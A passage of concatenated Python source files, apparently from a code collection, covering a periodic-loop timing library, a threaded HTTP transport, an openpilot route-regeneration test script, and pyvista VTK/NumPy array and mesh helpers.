Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
'''
Author: Burak Kakillioglu
Date: 11/12/2016
Library name: periodicrun
Description:
Python library for running a loop periodically with ~100 microseconds accuracy.
This library provides functionality for periodic execution of a method with accurate timing.
By "accurate timing" we mean that periodicrun guarantees the loop will run every x seconds with 100 microseconds (default) accuracy.
periodicrun uses Python's built-in sched library to schedule the execution of the given method periodically.
'''
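# Usage sketch (illustrative, not part of the original source; the API below is defined in this file):
#
#     def work():
#         print("tick")
#
#     pr = periodicrun(1.0, work, lifetime=10)   # call work() every second for ~10 seconds
#     pr.run_thread()                            # schedule the loop in a background thread
#     pr.join()                                  # block until the lifetime elapses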
import sched, time, threading
class periodicrun:
delta = 0.0
cycleCount = 0
is_thread = False
def __init__(self, period, loop, args=(), lifetime=0, accuracy=0.0001):
self.s = sched.scheduler(time.time, time.sleep)
self.period_acc = float(period)*accuracy
self.loop = loop
self.args = list(args)
self.lifetime = float(lifetime)
self.sample = 1/accuracy
self.tolerance = period * 1.1
def run(self):
self.offset = time.time()
self.lasttime = self.offset
self.cycle()
self.start_loop()
def run_thread(self):
self.is_thread = True
self.t = threading.Thread(target=self.start_loop)
self.offset = time.time()
self.lasttime = self.offset
self.cycle()
self.t.start()
def start_loop(self):
self.s.run()
def cycle(self):
self.delta = self.delta + self.period_acc
self.cycleCount = self.cycleCount+1
self.s.enterabs(self.offset + self.delta, 1, self.outer_loop, ())
def outer_loop(self):
if self.lifetime == 0 or self.delta < self.lifetime:
self.cycle()
if self.cycleCount == self.sample:
self.loop(*self.args)
self.cycleCount = 0
                # Check if execution time exceeds the period duration with 10% tolerance
now = time.time()
#print "now: ", now, ". self.lasttime: ", self.lasttime, ". diff: ", now-self.lasttime, "tol: ", self.tolerance
if now-self.lasttime > self.tolerance:
print "Warning: Execution time exceeds period duration"
self.lasttime = now
def join(self):
if self.is_thread:
self.t.join()
else: print "Error: Periodic run is not a seperate thread."
def interrupt(self):
if self.is_thread:
self.lifetime = 0.000001
print "Loop interrupted"
else: print "Error: Periodic run is not a seperate thread."
|
transport.py
|
import logging
import threading
from queue import Queue, Full
from urllib.request import Request, urlopen, HTTPError
from time import sleep
from typing import Dict
logger = logging.getLogger(__name__)
class Transport(object):
def send(self, url: str, headers: Dict[str, str], data: bytes):
raise NotImplementedError
class ThreadTransport(Transport):
def __init__(self, max_queue_size: int = -1, send_timeout: int = 5):
self._thread = None
self._active = False
self._lock = threading.Lock()
self._send_timeout = send_timeout
self._queue = Queue(max_queue_size)
def send(self, url: str, headers: Dict[str, str], data: bytes):
try:
self._queue.put((url, headers, data), block=False)
except Full:
logger.warning("Thread transport queue is full")
def is_alive(self):
return self._thread and self._thread.is_alive()
def start(self):
self._lock.acquire()
try:
if not self.is_alive():
name = "PySample.ThreadTransport"
self._active = True
self._thread = threading.Thread(target=self._run, name=name)
                self._thread.daemon = True
self._thread.start()
finally:
self._lock.release()
def stop(self, timeout: int = None):
with self._lock:
            if self._thread:
                # Signal the worker loop to exit before joining.
                self._active = False
self._thread.join(timeout=timeout)
self._thread = None
def _send_request(self, url: str, headers: Dict[str, str], data: bytes):
try:
response = urlopen(
url=Request(url, headers=headers), data=data, timeout=self._send_timeout
)
except HTTPError as e:
logger.error(str(e), stack_info=True)
raise
return response
def _run(self):
while self._active:
url, headers, data = self._queue.get()
try:
self._send_request(url, headers, data)
except Exception:
logger.error(f"Failed to send request to {url}")
finally:
self._queue.task_done()
sleep(0)
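# Usage sketch (illustrative; the URL, headers, and payload are placeholders, not from the original source):
#
#     transport = ThreadTransport(max_queue_size=100, send_timeout=5)
#     transport.start()
#     transport.send("https://example.com/ingest", {"Content-Type": "application/json"}, b"{}")
#     transport.stop(timeout=2)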
|
regen.py
|
#!/usr/bin/env python3
import os
import time
import multiprocessing
from tqdm import tqdm
import argparse
# run DM procs
os.environ["USE_WEBCAM"] = "1"
import cereal.messaging as messaging
from cereal.services import service_list
from cereal.visionipc.visionipc_pyx import VisionIpcServer, VisionStreamType # pylint: disable=no-name-in-module, import-error
from common.params import Params
from common.realtime import Ratekeeper, DT_MDL, DT_DMON, sec_since_boot
from common.transformations.camera import eon_f_frame_size, eon_d_frame_size, tici_f_frame_size, tici_d_frame_size
from selfdrive.car.fingerprints import FW_VERSIONS
from selfdrive.manager.process import ensure_running
from selfdrive.manager.process_config import managed_processes
from selfdrive.test.process_replay.process_replay import setup_env, check_enabled
from selfdrive.test.update_ci_routes import upload_route
from tools.lib.route import Route
from tools.lib.framereader import FrameReader
from tools.lib.logreader import LogReader
process_replay_dir = os.path.dirname(os.path.abspath(__file__))
FAKEDATA = os.path.join(process_replay_dir, "fakedata/")
def replay_panda_states(s, msgs):
pm = messaging.PubMaster([s, 'peripheralState'])
rk = Ratekeeper(service_list[s].frequency, print_delay_threshold=None)
smsgs = [m for m in msgs if m.which() in ['pandaStates', 'pandaStateDEPRECATED']]
  # Migrate safety param based on carParams
cp = [m for m in msgs if m.which() == 'carParams'][0].carParams
if len(cp.safetyConfigs):
safety_param = cp.safetyConfigs[0].safetyParam
if cp.safetyConfigs[0].safetyParamDEPRECATED != 0:
safety_param = cp.safetyConfigs[0].safetyParamDEPRECATED
else:
safety_param = cp.safetyParamDEPRECATED
while True:
for m in smsgs:
if m.which() == 'pandaStateDEPRECATED':
new_m = messaging.new_message('pandaStates', 1)
new_m.pandaStates[0] = m.pandaStateDEPRECATED
new_m.pandaStates[0].safetyParam = safety_param
pm.send(s, new_m)
else:
new_m = m.as_builder()
new_m.logMonoTime = int(sec_since_boot() * 1e9)
pm.send(s, new_m)
new_m = messaging.new_message('peripheralState')
pm.send('peripheralState', new_m)
rk.keep_time()
def replay_manager_state(s, msgs):
pm = messaging.PubMaster([s, ])
rk = Ratekeeper(service_list[s].frequency, print_delay_threshold=None)
while True:
new_m = messaging.new_message('managerState')
new_m.managerState.processes = [{'name': name, 'running': True} for name in managed_processes]
pm.send(s, new_m)
rk.keep_time()
def replay_device_state(s, msgs):
pm = messaging.PubMaster([s, ])
rk = Ratekeeper(service_list[s].frequency, print_delay_threshold=None)
smsgs = [m for m in msgs if m.which() == s]
while True:
for m in smsgs:
new_m = m.as_builder()
new_m.logMonoTime = int(sec_since_boot() * 1e9)
new_m.deviceState.freeSpacePercent = 50
new_m.deviceState.memoryUsagePercent = 50
pm.send(s, new_m)
rk.keep_time()
def replay_sensor_events(s, msgs):
pm = messaging.PubMaster([s, ])
rk = Ratekeeper(service_list[s].frequency, print_delay_threshold=None)
smsgs = [m for m in msgs if m.which() == s]
while True:
for m in smsgs:
new_m = m.as_builder()
new_m.logMonoTime = int(sec_since_boot() * 1e9)
for evt in new_m.sensorEvents:
evt.timestamp = new_m.logMonoTime
pm.send(s, new_m)
rk.keep_time()
def replay_service(s, msgs):
pm = messaging.PubMaster([s, ])
rk = Ratekeeper(service_list[s].frequency, print_delay_threshold=None)
smsgs = [m for m in msgs if m.which() == s]
while True:
for m in smsgs:
new_m = m.as_builder()
new_m.logMonoTime = int(sec_since_boot() * 1e9)
pm.send(s, new_m)
rk.keep_time()
def replay_cameras(lr, frs):
eon_cameras = [
("roadCameraState", DT_MDL, eon_f_frame_size, VisionStreamType.VISION_STREAM_ROAD, True),
("driverCameraState", DT_DMON, eon_d_frame_size, VisionStreamType.VISION_STREAM_DRIVER, False),
]
tici_cameras = [
("roadCameraState", DT_MDL, tici_f_frame_size, VisionStreamType.VISION_STREAM_ROAD, True),
("driverCameraState", DT_MDL, tici_d_frame_size, VisionStreamType.VISION_STREAM_DRIVER, False),
]
def replay_camera(s, stream, dt, vipc_server, frames, size, use_extra_client):
pm = messaging.PubMaster([s, ])
rk = Ratekeeper(1 / dt, print_delay_threshold=None)
img = b"\x00" * int(size[0] * size[1] * 3 / 2)
while True:
if frames is not None:
img = frames[rk.frame % len(frames)]
rk.keep_time()
m = messaging.new_message(s)
msg = getattr(m, s)
msg.frameId = rk.frame
msg.timestampSof = m.logMonoTime
msg.timestampEof = m.logMonoTime
pm.send(s, m)
vipc_server.send(stream, img, msg.frameId, msg.timestampSof, msg.timestampEof)
if use_extra_client:
vipc_server.send(VisionStreamType.VISION_STREAM_WIDE_ROAD, img, msg.frameId, msg.timestampSof, msg.timestampEof)
init_data = [m for m in lr if m.which() == 'initData'][0]
cameras = tici_cameras if (init_data.initData.deviceType == 'tici') else eon_cameras
# init vipc server and cameras
p = []
vs = VisionIpcServer("camerad")
for (s, dt, size, stream, use_extra_client) in cameras:
fr = frs.get(s, None)
frames = None
if fr is not None:
print(f"Decompressing frames {s}")
frames = []
for i in tqdm(range(fr.frame_count)):
img = fr.get(i, pix_fmt='yuv420p')[0]
frames.append(img.flatten().tobytes())
vs.create_buffers(stream, 40, False, size[0], size[1])
if use_extra_client:
vs.create_buffers(VisionStreamType.VISION_STREAM_WIDE_ROAD, 40, False, size[0], size[1])
p.append(multiprocessing.Process(target=replay_camera,
args=(s, stream, dt, vs, frames, size, use_extra_client)))
# hack to make UI work
vs.create_buffers(VisionStreamType.VISION_STREAM_RGB_ROAD, 4, True, eon_f_frame_size[0], eon_f_frame_size[1])
vs.start_listener()
return vs, p
def regen_segment(lr, frs=None, outdir=FAKEDATA):
lr = list(lr)
if frs is None:
frs = dict()
setup_env()
params = Params()
os.environ["LOG_ROOT"] = outdir
os.environ['SKIP_FW_QUERY'] = ""
os.environ['FINGERPRINT'] = ""
# TODO: remove after getting new route for mazda
migration = {
"Mazda CX-9 2021": "MAZDA CX-9 2021",
}
for msg in lr:
if msg.which() == 'carParams':
car_fingerprint = migration.get(msg.carParams.carFingerprint, msg.carParams.carFingerprint)
if len(msg.carParams.carFw) and (car_fingerprint in FW_VERSIONS):
params.put("CarParamsCache", msg.carParams.as_builder().to_bytes())
else:
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = car_fingerprint
elif msg.which() == 'liveCalibration':
params.put("CalibrationParams", msg.as_builder().to_bytes())
vs, cam_procs = replay_cameras(lr, frs)
fake_daemons = {
'sensord': [
multiprocessing.Process(target=replay_sensor_events, args=('sensorEvents', lr)),
],
'pandad': [
multiprocessing.Process(target=replay_service, args=('can', lr)),
multiprocessing.Process(target=replay_service, args=('ubloxRaw', lr)),
multiprocessing.Process(target=replay_panda_states, args=('pandaStates', lr)),
],
'managerState': [
multiprocessing.Process(target=replay_manager_state, args=('managerState', lr)),
],
'thermald': [
multiprocessing.Process(target=replay_device_state, args=('deviceState', lr)),
],
'camerad': [
*cam_procs,
],
}
try:
# TODO: make first run of onnxruntime CUDA provider fast
managed_processes["modeld"].start()
managed_processes["dmonitoringmodeld"].start()
time.sleep(5)
# start procs up
ignore = list(fake_daemons.keys()) + ['ui', 'manage_athenad', 'uploader']
ensure_running(managed_processes.values(), started=True, not_run=ignore)
for procs in fake_daemons.values():
for p in procs:
p.start()
for _ in tqdm(range(60)):
# ensure all procs are running
for d, procs in fake_daemons.items():
for p in procs:
if not p.is_alive():
raise Exception(f"{d}'s {p.name} died")
time.sleep(1)
finally:
# kill everything
for p in managed_processes.values():
p.stop()
for procs in fake_daemons.values():
for p in procs:
p.terminate()
del vs
segment = params.get("CurrentRoute", encoding='utf-8') + "--0"
seg_path = os.path.join(outdir, segment)
# check to make sure openpilot is engaged in the route
if not check_enabled(LogReader(os.path.join(seg_path, "rlog.bz2"))):
raise Exception(f"Route never enabled: {segment}")
return seg_path
def regen_and_save(route, sidx, upload=False, use_route_meta=False):
if use_route_meta:
    r = Route(route)
    lr = LogReader(r.log_paths()[sidx])
    fr = FrameReader(r.camera_paths()[sidx])
else:
lr = LogReader(f"cd:/{route.replace('|', '/')}/{sidx}/rlog.bz2")
fr = FrameReader(f"cd:/{route.replace('|', '/')}/{sidx}/fcamera.hevc")
rpath = regen_segment(lr, {'roadCameraState': fr})
lr = LogReader(os.path.join(rpath, 'rlog.bz2'))
controls_state_active = [m.controlsState.active for m in lr if m.which() == 'controlsState']
assert any(controls_state_active), "Segment did not engage"
relr = os.path.relpath(rpath)
print("\n\n", "*"*30, "\n\n")
print("New route:", relr, "\n")
if upload:
upload_route(relr)
return relr
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Generate new segments from old ones")
parser.add_argument("--upload", action="store_true", help="Upload the new segment to the CI bucket")
parser.add_argument("route", type=str, help="The source route")
parser.add_argument("seg", type=int, help="Segment in source route")
args = parser.parse_args()
regen_and_save(args.route, args.seg, args.upload)
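# Example invocation (route name and segment index are illustrative):
#   python regen.py "99c94dc769b5d96e|2019-08-03--14-19-59" 3 --upload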
|
helpers.py
|
"""Supporting functions for polydata and grid objects."""
import os
import collections.abc
import enum
import logging
import signal
import sys
from threading import Thread
import threading
import traceback
import numpy as np
from pyvista import _vtk
import pyvista
from .fileio import from_meshio
from . import transformations
class FieldAssociation(enum.Enum):
"""Represents which type of vtk field a scalar or vector array is associated with."""
POINT = _vtk.vtkDataObject.FIELD_ASSOCIATION_POINTS
CELL = _vtk.vtkDataObject.FIELD_ASSOCIATION_CELLS
NONE = _vtk.vtkDataObject.FIELD_ASSOCIATION_NONE
ROW = _vtk.vtkDataObject.FIELD_ASSOCIATION_ROWS
def get_vtk_type(typ):
"""Look up the VTK type for a give python data type.
Corrects for string type mapping issues.
Returns
-------
int : the integer type id specified in vtkType.h
"""
typ = _vtk.get_vtk_array_type(typ)
# This handles a silly string type bug
if typ == 3:
return 13
return typ
def vtk_bit_array_to_char(vtkarr_bint):
"""Cast vtk bit array to a char array."""
vtkarr = _vtk.vtkCharArray()
vtkarr.DeepCopy(vtkarr_bint)
return vtkarr
def vtk_id_list_to_array(vtk_id_list):
"""Convert a vtkIdList to a NumPy array."""
return np.array([vtk_id_list.GetId(i) for i in range(vtk_id_list.GetNumberOfIds())])
def convert_string_array(arr, name=None):
"""Convert a numpy array of strings to a vtkStringArray or vice versa.
Note that this is terribly inefficient - inefficient support
is better than no support :). If you have ideas on how to make this faster,
please consider opening a pull request.
"""
if isinstance(arr, np.ndarray):
vtkarr = _vtk.vtkStringArray()
########### OPTIMIZE ###########
for val in arr:
vtkarr.InsertNextValue(val)
################################
if isinstance(name, str):
vtkarr.SetName(name)
return vtkarr
# Otherwise it is a vtk array and needs to be converted back to numpy
############### OPTIMIZE ###############
nvalues = arr.GetNumberOfValues()
return np.array([arr.GetValue(i) for i in range(nvalues)], dtype='|U')
########################################
def convert_array(arr, name=None, deep=0, array_type=None):
"""Convert a NumPy array to a vtkDataArray or vice versa.
Parameters
    ----------
    arr : ndarray or vtkDataArray
        A numpy array or vtkDataArray to convert.
name : str
The name of the data array for VTK
deep : bool
if input is numpy array then deep copy values
Returns
-------
    vtkDataArray or ndarray
        The converted array: if the input is a NumPy ``ndarray`` then a
        ``vtkDataArray`` is returned; if the input is a ``vtkDataArray``
        then a NumPy ``ndarray`` is returned.
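    Examples
    --------
    A minimal round-trip sketch (illustrative):
    >>> import numpy as np
    >>> arr = np.array([1.0, 2.0, 3.0])
    >>> vtk_arr = convert_array(arr, name='values')  # doctest:+SKIP
    >>> convert_array(vtk_arr)  # doctest:+SKIP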
"""
if arr is None:
return
if isinstance(arr, np.ndarray):
if arr.dtype is np.dtype('O'):
arr = arr.astype('|S')
arr = np.ascontiguousarray(arr)
if arr.dtype.type in (np.str_, np.bytes_):
# This handles strings
vtk_data = convert_string_array(arr)
else:
# This will handle numerical data
arr = np.ascontiguousarray(arr)
vtk_data = _vtk.numpy_to_vtk(num_array=arr, deep=deep,
array_type=array_type)
if isinstance(name, str):
vtk_data.SetName(name)
return vtk_data
# Otherwise input must be a vtkDataArray
if not isinstance(arr, (_vtk.vtkDataArray, _vtk.vtkBitArray, _vtk.vtkStringArray)):
raise TypeError(f'Invalid input array type ({type(arr)}).')
# Handle booleans
if isinstance(arr, _vtk.vtkBitArray):
arr = vtk_bit_array_to_char(arr)
# Handle string arrays
if isinstance(arr, _vtk.vtkStringArray):
return convert_string_array(arr)
    # Convert from vtkDataArray to NumPy
return _vtk.vtk_to_numpy(arr)
def is_pyvista_dataset(obj):
"""Return True if the Object is a PyVista wrapped dataset."""
return isinstance(obj, (pyvista.DataSet, pyvista.MultiBlock))
def point_array(mesh, name):
"""Return point array of a vtk object."""
vtkarr = mesh.GetPointData().GetAbstractArray(name)
return convert_array(vtkarr)
def field_array(mesh, name):
"""Return field array of a vtk object."""
vtkarr = mesh.GetFieldData().GetAbstractArray(name)
return convert_array(vtkarr)
def cell_array(mesh, name):
"""Return cell array of a vtk object."""
vtkarr = mesh.GetCellData().GetAbstractArray(name)
return convert_array(vtkarr)
def row_array(data_object, name):
"""Return row array of a vtk object."""
vtkarr = data_object.GetRowData().GetAbstractArray(name)
return convert_array(vtkarr)
def parse_field_choice(field):
"""Return the id of the given field."""
if isinstance(field, str):
field = field.strip().lower()
if field in ['cell', 'c', 'cells']:
field = FieldAssociation.CELL
elif field in ['point', 'p', 'points']:
field = FieldAssociation.POINT
elif field in ['field', 'f', 'fields']:
field = FieldAssociation.NONE
elif field in ['row', 'r']:
field = FieldAssociation.ROW
else:
raise ValueError(f'Data field ({field}) not supported.')
elif isinstance(field, FieldAssociation):
pass
else:
raise ValueError(f'Data field ({field}) not supported.')
return field
def get_array(mesh, name, preference='cell', info=False, err=False):
"""Search point, cell and field data for an array.
Parameters
----------
    name : str
        The name of the array to retrieve.
preference : str, optional
When scalars is specified, this is the preferred array type to
search for in the dataset. Must be either ``'point'``,
``'cell'``, or ``'field'``
info : bool
Return info about the array rather than the array itself.
err : bool
Boolean to control whether to throw an error if array is not present.
"""
if isinstance(mesh, _vtk.vtkTable):
arr = row_array(mesh, name)
if arr is None and err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
field = FieldAssociation.ROW
if info:
return arr, field
return arr
parr = point_array(mesh, name)
carr = cell_array(mesh, name)
farr = field_array(mesh, name)
preference = parse_field_choice(preference)
if np.sum([parr is not None, carr is not None, farr is not None]) > 1:
if preference == FieldAssociation.CELL:
if info:
return carr, FieldAssociation.CELL
else:
return carr
elif preference == FieldAssociation.POINT:
if info:
return parr, FieldAssociation.POINT
else:
return parr
elif preference == FieldAssociation.NONE:
if info:
return farr, FieldAssociation.NONE
else:
return farr
else:
raise ValueError(f'Data field ({preference}) not supported.')
arr = None
field = None
if parr is not None:
arr = parr
field = FieldAssociation.POINT
elif carr is not None:
arr = carr
field = FieldAssociation.CELL
elif farr is not None:
arr = farr
field = FieldAssociation.NONE
elif err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
if info:
return arr, field
return arr
def vtk_points(points, deep=True):
"""Convert numpy array or array-like to a vtkPoints object."""
points = np.asanyarray(points)
# verify is numeric
if not np.issubdtype(points.dtype, np.number):
raise TypeError('Points must be a numeric type')
# check dimensionality
if points.ndim == 1:
points = points.reshape(-1, 3)
elif points.ndim > 2:
raise ValueError('Dimension of ``points`` should be 1 or 2, not '
f'{points.ndim}')
# verify shape
if points.shape[1] != 3:
raise ValueError('Points array must contain three values per point. '
f'Shape is {points.shape} and should be (X, 3)')
# points must be contiguous
points = np.require(points, requirements=['C'])
vtkpts = _vtk.vtkPoints()
vtk_arr = _vtk.numpy_to_vtk(points, deep=deep)
vtkpts.SetData(vtk_arr)
return vtkpts
def line_segments_from_points(points):
"""Generate non-connected line segments from points.
Assumes points are ordered as line segments and an even number of
points.
Parameters
----------
points : np.ndarray
Points representing line segments. An even number must be
given as every two vertices represent a single line
segment. For example, two line segments would be represented
as:
``np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])``
Returns
-------
lines : pyvista.PolyData
PolyData with lines and cells.
Examples
--------
This example plots two line segments at right angles to each other.
>>> import pyvista
>>> import numpy as np
>>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
    >>> lines = pyvista.line_segments_from_points(points)
>>> cpos = lines.plot()
"""
if len(points) % 2 != 0:
raise ValueError("An even number of points must be given to define each segment.")
# Assuming ordered points, create array defining line order
n_points = len(points)
n_lines = n_points // 2
lines = np.c_[(2 * np.ones(n_lines, np.int_),
np.arange(0, n_points-1, step=2),
np.arange(1, n_points+1, step=2))]
poly = pyvista.PolyData()
poly.points = points
poly.lines = lines
return poly
def lines_from_points(points, close=False):
"""Make a connected line set given an array of points.
Parameters
----------
points : np.ndarray
Points representing the vertices of the connected segments. For
example, two line segments would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]])
close : bool, optional
If True, close the line segments into a loop
Returns
-------
lines : pyvista.PolyData
PolyData with lines and cells.
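    Examples
    --------
    A minimal sketch connecting three points into two joined segments (illustrative):
    >>> import numpy as np
    >>> import pyvista
    >>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]])
    >>> poly = pyvista.lines_from_points(points)
    >>> cpos = poly.plot()  # doctest:+SKIP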
"""
poly = pyvista.PolyData()
poly.points = points
cells = np.full((len(points)-1, 3), 2, dtype=np.int_)
cells[:, 1] = np.arange(0, len(points)-1, dtype=np.int_)
cells[:, 2] = np.arange(1, len(points), dtype=np.int_)
if close:
cells = np.append(cells, [[2, len(points)-1, 0]], axis=0)
poly.lines = cells
return poly
def make_tri_mesh(points, faces):
"""Construct a ``pyvista.PolyData`` mesh using points and faces arrays.
Construct a mesh from an Nx3 array of points and an Mx3 array of
triangle indices, resulting in a mesh with N vertices and M
triangles. This function does not require the standard VTK
"padding" column and simplifies mesh creation.
Parameters
----------
points : np.ndarray
Array of points with shape (N, 3) storing the vertices of the
triangle mesh.
faces : np.ndarray
Array of indices with shape ``(M, 3)`` containing the triangle
indices.
Returns
-------
tri_mesh : pyvista.PolyData
PolyData instance containing the triangle mesh.
Examples
--------
This example discretizes the unit square into a triangle mesh with
nine vertices and eight faces.
>>> import numpy as np
>>> import pyvista as pv
>>> points = np.array([[0, 0, 0], [0.5, 0, 0], [1, 0, 0], [0, 0.5, 0],
... [0.5, 0.5, 0], [1, 0.5, 0], [0, 1, 0], [0.5, 1, 0],
... [1, 1, 0]])
>>> faces = np.array([[0, 1, 4], [4, 7, 6], [2, 5, 4], [4, 5, 8],
... [0, 4, 3], [3, 4, 6], [1, 2, 4], [4, 8, 7]])
    >>> tri_mesh = pv.make_tri_mesh(points, faces)
>>> cpos = tri_mesh.plot(show_edges=True)
"""
if points.shape[1] != 3:
raise ValueError("Points array should have shape (N, 3).")
if faces.ndim != 2 or faces.shape[1] != 3:
raise ValueError("Face array should have shape (M, 3).")
cells = np.empty((faces.shape[0], 4), dtype=faces.dtype)
cells[:, 0] = 3
cells[:, 1:] = faces
return pyvista.PolyData(points, cells)
def vector_poly_data(orig, vec):
"""Create a vtkPolyData object composed of vectors."""
# shape, dimension checking
if not isinstance(orig, np.ndarray):
orig = np.asarray(orig)
if not isinstance(vec, np.ndarray):
vec = np.asarray(vec)
if orig.ndim != 2:
orig = orig.reshape((-1, 3))
elif orig.shape[1] != 3:
raise ValueError('orig array must be 3D')
if vec.ndim != 2:
vec = vec.reshape((-1, 3))
elif vec.shape[1] != 3:
raise ValueError('vec array must be 3D')
# Create vtk points and cells objects
vpts = _vtk.vtkPoints()
vpts.SetData(_vtk.numpy_to_vtk(np.ascontiguousarray(orig), deep=True))
npts = orig.shape[0]
cells = np.empty((npts, 2), dtype=pyvista.ID_TYPE)
cells[:, 0] = 1
cells[:, 1] = np.arange(npts, dtype=pyvista.ID_TYPE)
vcells = pyvista.utilities.cells.CellArray(cells, npts)
# Create vtkPolyData object
pdata = _vtk.vtkPolyData()
pdata.SetPoints(vpts)
pdata.SetVerts(vcells)
# Add vectors to polydata
name = 'vectors'
vtkfloat = _vtk.numpy_to_vtk(np.ascontiguousarray(vec), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveVectors(name)
# Add magnitude of vectors to polydata
name = 'mag'
scalars = (vec * vec).sum(1)**0.5
vtkfloat = _vtk.numpy_to_vtk(np.ascontiguousarray(scalars), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveScalars(name)
return pyvista.PolyData(pdata)
def trans_from_matrix(matrix): # pragma: no cover
"""Convert a vtk matrix to a numpy.ndarray.
DEPRECATED: Please use ``array_from_vtkmatrix``.
"""
# import needs to happen here to prevent a circular import
from pyvista.core.errors import DeprecationError
raise DeprecationError('DEPRECATED: Please use ``array_from_vtkmatrix``.')
def array_from_vtkmatrix(matrix):
"""Convert a vtk matrix to a ``numpy.ndarray``.
Parameters
----------
matrix : vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4
The vtk matrix to be converted to a ``numpy.ndarray``.
Returned ndarray has shape (3, 3) or (4, 4) as appropriate.
"""
if isinstance(matrix, _vtk.vtkMatrix3x3):
shape = (3, 3)
elif isinstance(matrix, _vtk.vtkMatrix4x4):
shape = (4, 4)
else:
raise TypeError('Expected vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4 input,'
f' got {type(matrix).__name__} instead.')
array = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
array[i, j] = matrix.GetElement(i, j)
return array
def vtkmatrix_from_array(array):
"""Convert a ``numpy.ndarray`` or array-like to a vtk matrix.
Parameters
----------
array : numpy.ndarray or array-like
The array or array-like to be converted to a vtk matrix.
Shape (3, 3) gets converted to a ``vtk.vtkMatrix3x3``, shape (4, 4)
gets converted to a ``vtk.vtkMatrix4x4``. No other shapes are valid.
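    Examples
    --------
    A minimal sketch converting a 4x4 identity matrix (illustrative):
    >>> import numpy as np
    >>> import pyvista
    >>> matrix = pyvista.vtkmatrix_from_array(np.eye(4))  # doctest:+SKIP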
"""
array = np.asarray(array)
if array.shape == (3, 3):
matrix = _vtk.vtkMatrix3x3()
elif array.shape == (4, 4):
matrix = _vtk.vtkMatrix4x4()
else:
raise ValueError(f'Invalid shape {array.shape}, must be (3, 3) or (4, 4).')
m, n = array.shape
for i in range(m):
for j in range(n):
matrix.SetElement(i, j, array[i, j])
return matrix
def is_meshio_mesh(mesh):
"""Test if passed object is instance of ``meshio.Mesh``."""
try:
import meshio
return isinstance(mesh, meshio.Mesh)
except ImportError:
return False
def wrap(dataset):
"""Wrap any given VTK data object to its appropriate pyvista data object.
Other formats that are supported include:
* 2D :class:`numpy.ndarray` of XYZ vertices
* 3D :class:`numpy.ndarray` representing a volume. Values will be scalars.
* 3D :class:`trimesh.Trimesh` mesh.
* 3D :class:`meshio` mesh.
Parameters
----------
dataset : :class:`numpy.ndarray`, :class:`trimesh.Trimesh`, or VTK object
Dataset to wrap.
Returns
-------
wrapped_dataset : pyvista class
The `pyvista` wrapped dataset.
Examples
--------
Wrap a numpy array representing a random point cloud.
>>> import numpy as np
>>> import pyvista
>>> points = np.random.random((10, 3))
>>> cloud = pyvista.wrap(points)
>>> cloud # doctest:+SKIP
PolyData (0x7fc52db83d70)
N Cells: 10
N Points: 10
X Bounds: 1.123e-01, 7.457e-01
Y Bounds: 1.009e-01, 9.877e-01
Z Bounds: 2.346e-03, 9.640e-01
N Arrays: 0
Wrap a Trimesh object.
>>> import trimesh
>>> import pyvista
>>> points = [[0, 0, 0], [0, 0, 1], [0, 1, 0]]
>>> faces = [[0, 1, 2]]
>>> tmesh = trimesh.Trimesh(points, faces=faces, process=False)
>>> mesh = pyvista.wrap(tmesh)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
Wrap a VTK object.
>>> import pyvista
>>> import vtk
>>> points = vtk.vtkPoints()
>>> p = [1.0, 2.0, 3.0]
>>> vertices = vtk.vtkCellArray()
>>> pid = points.InsertNextPoint(p)
>>> _ = vertices.InsertNextCell(1)
>>> _ = vertices.InsertCellPoint(pid)
>>> point = vtk.vtkPolyData()
>>> _ = point.SetPoints(points)
>>> _ = point.SetVerts(vertices)
>>> mesh = pyvista.wrap(point)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
"""
# Return if None
if dataset is None:
return
# Check if dataset is a numpy array. We do this first since
# pyvista_ndarray contains a VTK type that we don't want to
# directly wrap.
if isinstance(dataset, (np.ndarray, pyvista.pyvista_ndarray)):
if dataset.ndim == 1 and dataset.shape[0] == 3:
return pyvista.PolyData(dataset)
if dataset.ndim > 1 and dataset.ndim < 3 and dataset.shape[1] == 3:
return pyvista.PolyData(dataset)
elif dataset.ndim == 3:
mesh = pyvista.UniformGrid(dataset.shape)
mesh['values'] = dataset.ravel(order='F')
mesh.active_scalars_name = 'values'
return mesh
else:
            raise NotImplementedError('NumPy array could not be wrapped by pyvista.')
wrappers = {
